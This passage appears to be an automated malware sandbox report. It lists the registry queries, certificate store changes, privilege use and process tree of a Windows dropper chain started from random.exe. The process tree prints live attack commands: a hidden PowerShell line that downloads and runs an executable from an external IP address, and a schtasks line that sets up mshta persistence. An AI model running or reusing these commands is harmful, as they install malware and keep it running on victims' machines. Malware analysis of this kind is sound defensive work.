firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3r19R.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1076 timeout.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer packed.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 226 Go-http-client/1.1 -
Kills process with taskkill 5 IoCs
pid Process 2340 taskkill.exe 2276 taskkill.exe 4260 taskkill.exe 1240 taskkill.exe 3388 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133865864185453874" chrome.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\9E99A48A9960B14926BB7F3B02E22DA2B0AB7280 0000023991.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\9E99A48A9960B14926BB7F3B02E22DA2B0AB7280\Blob = 0300000001000000140000009e99a48a9960b14926bb7f3b02e22da2b0ab72801400000001000000140000009c5f00dfaa01d7302b3888a2b86d4a9cf2119183040000000100000010000000c6150925cfea5941ddc7ff2a0a5066920f00000001000000200000008408d5e5010ab8da67eb33a7d79ace944dd0ac103ae6ead3ff30dec571066b0319000000010000001000000014d4b19434670e6dc091d154abb20edc5c000000010000000400000000080000180000000100000010000000fd960962ac6938e0d4b0769aa1a64e26200000000100000079040000308204753082035da003020102020900a70e4a4c3482b77f300d06092a864886f70d01010b05003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3039303930323030303030305a170d3334303632383137333931365a308198310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e313b303906035504031332537461726669656c6420536572766963657320526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100d50c3ac42af94ee2f5be19975f8e8853b11f3fcbcf9f20136d293ac80f7d3cf76b763863d93660a89b5e5c0080b22f597ff687f9254386e7691b529a90e171e3d82d0d4e6ff6c849d9b6f31a56ae2bb67414ebcffb26e31aba1d962e6a3b5894894756ff25a093705383da847414c3679e04683adf8e405a1d4a4ecf43913be756d60070cb52ee7b7dae3ae7bc31f945f6c260cf1359022b80cc3447dfb9de90656d02cf2c91a6a6e7de8518497c664ea33a6da9b5ee342eba0d03b833df47ebb16b8d25d99bce81d1454632967087de020e494385b66c73bb64ea6141acc9d454df872fc722b226cc9f5954689ffcbe2a2fc4551c75406017850255398b7f050203010001a381f03081ed300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604149c5f00dfaa01d7302b3888a2b86d4a9cf2119183301f0603551d23041830168014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7304f06082b0601050507010104433041301c06082b060105050730018610687474703a2f2f6f2e7373322e75732f302106082b060105050730028615687474703a2f2f782e7373322e75732f782e63657230260603551d1f041f301d301ba019a0178615687474703a2f2f732e7373322e75732f722e63726c30110603551d20040a300830060604551d2000300d06092a864886f70d01010b05000382010100231de38a57ca7de917794cf11e55fdcc536e3e470fdfc655f2b20436ed801f53c45d34286bbec755fc67eacb3f7f90b233cd1b58108202f8f82ff51360d405cef18108c1dda775974f18b96ddef7939108ba7e402cedc1eabb769e3306771d0d087f53dd1b64ab8227f169d54d5eaef4a1c375a758442df23c7098acba69b695777f0f315e2cfca0873a4769f0795ff41454a4955e1178126027ce9fc277ff2353775dbaffea59e7dbcfaf9296ef249a35107a9c91c60e7d99f63f19dff57254e115a907597b83bf522e468cb20064761c48d3d879e86e56ccae2c0390d7193899e4ca09195bff0796b0a87f3449df56a9f7b05fed33ed8c47b730035df4038c 0000023991.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A 0000023991.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 0000023991.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c000000010000000400000000080000190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 0000023991.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5480 schtasks.exe 1688 schtasks.exe 3972 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1928 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5568 1u87m9.exe 5568 1u87m9.exe 4208 rapes.exe 4208 rapes.exe 4772 2x8387.exe 4772 2x8387.exe 4772 2x8387.exe 4772 2x8387.exe 4772 2x8387.exe 4772 2x8387.exe 4772 2x8387.exe 4772 2x8387.exe 4772 2x8387.exe 4772 2x8387.exe 3948 powershell.exe 3948 powershell.exe 5096 EOQAPR57ODIFE70BDKFTZDQP.exe 5096 EOQAPR57ODIFE70BDKFTZDQP.exe 3380 3r19R.exe 3380 3r19R.exe 3380 3r19R.exe 3380 3r19R.exe 3420 Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE 3420 Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE 3380 3r19R.exe 3380 3r19R.exe 3404 powershell.exe 3404 powershell.exe 3404 powershell.exe 2560 chrome.exe 2560 chrome.exe 3192 powershell.exe 3192 powershell.exe 3192 powershell.exe 4468 powershell.exe 4468 powershell.exe 4468 powershell.exe 3248 powershell.exe 3248 powershell.exe 3248 powershell.exe 3372 483d2fa8a0d53818306efeb32d3.exe 3372 483d2fa8a0d53818306efeb32d3.exe 3380 3r19R.exe 3380 3r19R.exe 3380 3r19R.exe 3380 3r19R.exe 6036 dbe09a8462.exe 6036 dbe09a8462.exe 3380 3r19R.exe 3380 3r19R.exe 1564 139b1863a7.exe 1564 139b1863a7.exe 1564 139b1863a7.exe 1564 139b1863a7.exe 1564 139b1863a7.exe 1564 139b1863a7.exe 1564 139b1863a7.exe 1564 139b1863a7.exe 3540 MSBuild.exe 3540 MSBuild.exe 3540 MSBuild.exe 3540 MSBuild.exe 3540 MSBuild.exe 3540 MSBuild.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 3376 SplashWin.exe 1788 irestore.exe 3920 cmd.exe 1716 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 5504 msedge.exe 5504 msedge.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeImpersonatePrivilege 4772 2x8387.exe Token: SeImpersonatePrivilege 4772 2x8387.exe Token: SeDebugPrivilege 3948 powershell.exe Token: SeDebugPrivilege 3404 powershell.exe Token: SeShutdownPrivilege 2560 chrome.exe Token: SeCreatePagefilePrivilege 2560 chrome.exe Token: SeDebugPrivilege 3192 powershell.exe Token: SeShutdownPrivilege 2560 chrome.exe Token: SeCreatePagefilePrivilege 2560 chrome.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeShutdownPrivilege 2560 chrome.exe Token: SeCreatePagefilePrivilege 2560 chrome.exe Token: SeDebugPrivilege 3248 powershell.exe Token: SeShutdownPrivilege 2560 chrome.exe Token: SeCreatePagefilePrivilege 2560 chrome.exe Token: SeShutdownPrivilege 2560 chrome.exe Token: SeCreatePagefilePrivilege 2560 chrome.exe Token: SeShutdownPrivilege 2560 chrome.exe Token: SeCreatePagefilePrivilege 2560 chrome.exe Token: SeShutdownPrivilege 2560 chrome.exe Token: SeCreatePagefilePrivilege 2560 chrome.exe Token: SeImpersonatePrivilege 1564 139b1863a7.exe Token: SeImpersonatePrivilege 1564 139b1863a7.exe Token: SeImpersonatePrivilege 3540 MSBuild.exe Token: SeImpersonatePrivilege 3540 MSBuild.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 5480 powershell.exe Token: SeDebugPrivilege 2340 powershell.exe Token: SeImpersonatePrivilege 5092 3c203fabe0.exe Token: SeImpersonatePrivilege 5092 3c203fabe0.exe Token: SeImpersonatePrivilege 5868 3f0728ca94.exe Token: SeImpersonatePrivilege 5868 3f0728ca94.exe Token: SeImpersonatePrivilege 4056 7bf490c150.exe Token: SeImpersonatePrivilege 4056 7bf490c150.exe Token: SeImpersonatePrivilege 3252 c444958f86.exe Token: SeImpersonatePrivilege 3252 c444958f86.exe Token: SeDebugPrivilege 4260 taskkill.exe Token: SeDebugPrivilege 1240 taskkill.exe Token: SeDebugPrivilege 3388 taskkill.exe Token: SeDebugPrivilege 2340 taskkill.exe Token: SeDebugPrivilege 2276 taskkill.exe Token: SeDebugPrivilege 1932 firefox.exe Token: SeDebugPrivilege 1932 firefox.exe Token: SeDebugPrivilege 7188 baf2e63155.exe Token: SeImpersonatePrivilege 1272 affbf8475a.exe Token: SeImpersonatePrivilege 1272 affbf8475a.exe Token: SeShutdownPrivilege 5884 chrome.exe Token: SeCreatePagefilePrivilege 5884 chrome.exe Token: SeShutdownPrivilege 5884 chrome.exe Token: SeCreatePagefilePrivilege 5884 chrome.exe Token: SeShutdownPrivilege 5884 chrome.exe Token: SeCreatePagefilePrivilege 5884 chrome.exe Token: SeShutdownPrivilege 5884 chrome.exe Token: SeCreatePagefilePrivilege 5884 chrome.exe Token: SeShutdownPrivilege 5884 chrome.exe Token: SeCreatePagefilePrivilege 5884 chrome.exe Token: SeShutdownPrivilege 5884 chrome.exe Token: SeCreatePagefilePrivilege 5884 chrome.exe Token: SeShutdownPrivilege 5884 chrome.exe Token: SeCreatePagefilePrivilege 5884 chrome.exe Token: SeShutdownPrivilege 5884 chrome.exe Token: SeCreatePagefilePrivilege 5884 chrome.exe Token: SeShutdownPrivilege 5884 chrome.exe Token: SeCreatePagefilePrivilege 5884 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5568 1u87m9.exe 4800 7d89e79575.exe 4800 7d89e79575.exe 4800 7d89e79575.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 2560 chrome.exe 5504 msedge.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe -
Suspicious use of SendNotifyMessage 50 IoCs
pid Process 4800 7d89e79575.exe 4800 7d89e79575.exe 4800 7d89e79575.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 1932 firefox.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 4516 0982cdebf5.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe 5884 chrome.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5600 HmngBpR.exe 1932 firefox.exe 1928 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3388 wrote to memory of 376 3388 random.exe 88 PID 3388 wrote to memory of 376 3388 random.exe 88 PID 3388 wrote to memory of 376 3388 random.exe 88 PID 376 wrote to memory of 5568 376 u0k28.exe 89 PID 376 wrote to memory of 5568 376 u0k28.exe 89 PID 376 wrote to memory of 5568 376 u0k28.exe 89 PID 5568 wrote to memory of 4208 5568 1u87m9.exe 93 PID 5568 wrote to memory of 4208 5568 1u87m9.exe 93 PID 5568 wrote to memory of 4208 5568 1u87m9.exe 93 PID 376 wrote to memory of 4772 376 u0k28.exe 94 PID 376 wrote to memory of 4772 376 u0k28.exe 94 PID 376 wrote to memory of 4772 376 u0k28.exe 94 PID 4208 wrote to memory of 4800 4208 rapes.exe 96 PID 4208 wrote to memory of 4800 4208 rapes.exe 96 PID 4208 wrote to memory of 4800 4208 rapes.exe 96 PID 4800 wrote to memory of 1408 4800 7d89e79575.exe 97 PID 4800 wrote to memory of 1408 4800 7d89e79575.exe 97 PID 4800 wrote to memory of 1408 4800 7d89e79575.exe 97 PID 4800 wrote to memory of 5856 4800 7d89e79575.exe 98 PID 4800 wrote to memory of 5856 4800 7d89e79575.exe 98 PID 4800 wrote to memory of 5856 4800 7d89e79575.exe 98 PID 1408 wrote to memory of 5480 1408 cmd.exe 100 PID 1408 wrote to memory of 5480 1408 cmd.exe 100 PID 1408 wrote to memory of 5480 1408 cmd.exe 100 PID 5856 wrote to memory of 3948 5856 mshta.exe 101 PID 5856 wrote to memory of 3948 5856 mshta.exe 101 PID 5856 wrote to memory of 3948 5856 mshta.exe 101 PID 4772 wrote to memory of 5096 4772 2x8387.exe 103 PID 4772 wrote to memory of 5096 4772 2x8387.exe 103 PID 4772 wrote to memory of 5096 4772 2x8387.exe 103 PID 3388 wrote to memory of 3380 3388 random.exe 104 PID 3388 wrote to memory of 3380 3388 random.exe 104 PID 3388 wrote to memory of 3380 3388 random.exe 104 PID 4208 wrote to memory of 3660 4208 rapes.exe 105 PID 4208 wrote to memory of 3660 4208 rapes.exe 105 PID 4208 wrote to memory of 3660 4208 rapes.exe 105 PID 3660 wrote to memory of 1076 3660 cmd.exe 107 PID 3660 wrote to memory of 1076 3660 cmd.exe 107 PID 3660 wrote to memory of 1076 3660 cmd.exe 107 PID 3948 wrote to memory of 3420 3948 powershell.exe 108 PID 3948 wrote to memory of 3420 3948 powershell.exe 108 PID 3948 wrote to memory of 3420 3948 powershell.exe 108 PID 3660 wrote to memory of 5432 3660 cmd.exe 109 PID 3660 wrote to memory of 5432 3660 cmd.exe 109 PID 3660 wrote to memory of 5432 3660 cmd.exe 109 PID 5432 wrote to memory of 3404 5432 cmd.exe 110 PID 5432 wrote to memory of 3404 5432 cmd.exe 110 PID 5432 wrote to memory of 3404 5432 cmd.exe 110 PID 3380 wrote to memory of 2560 3380 3r19R.exe 111 PID 3380 wrote to memory of 2560 3380 3r19R.exe 111 PID 2560 wrote to memory of 3176 2560 chrome.exe 112 PID 2560 wrote to memory of 3176 2560 chrome.exe 112 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 PID 2560 wrote to memory of 2296 2560 chrome.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5568 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\10232130101\7d89e79575.exe"C:\Users\Admin\AppData\Local\Temp\10232130101\7d89e79575.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn xBohtmaaiUa /tr "mshta C:\Users\Admin\AppData\Local\Temp\oNTIpkW9d.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn xBohtmaaiUa /tr "mshta C:\Users\Admin\AppData\Local\Temp\oNTIpkW9d.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5480
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\oNTIpkW9d.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5856 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Users\Admin\AppData\Local\Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE"C:\Users\Admin\AppData\Local\Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3420
-
-
-
-
-
